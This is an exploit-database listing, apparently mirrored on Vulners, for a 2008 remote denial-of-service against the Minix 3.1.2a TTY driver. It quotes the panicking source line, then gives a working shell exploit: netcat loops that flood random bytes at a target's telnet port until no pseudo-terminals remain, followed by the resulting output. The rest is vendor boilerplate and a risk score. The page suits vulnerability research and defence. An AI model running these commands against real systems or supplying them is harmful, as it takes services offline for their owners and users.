Lucene search
K

Minix 3.1.2a - Remote TTY Panic (Denial of Service)

🗓️ 25 Jul 2008 00:00:00Reported by kokaninType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 28 Views

Minix 3.1.2a Remote TTY Panic - Denial of Service vulnerability in tty.

Code
# kokanin@gmail 20080724
# minix 3.1.2a remote tty panic

trunk/src/drivers/tty/tty.c

 14965	  if ((status = send(replyee, &tty_mess)) != OK) {
 14966	        panic("TTY","tty_reply failed, status\n", status);


$ (while true ; do sleep 1 && killall nc 2>/dev/null; done) &
$ while true ; do cat /dev/urandom | nc 192.168.1.42 23 ; done
[snip garbage]
I am sorry, but there is no free PTY left!
$ fg
$ ^C

hai, no moar pty, remotely, kthxbye
--
kokanin

# milw0rm.com [2008-07-25]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 Jul 2008 00:00Current
7.4High risk
Vulners AI Score7.4
28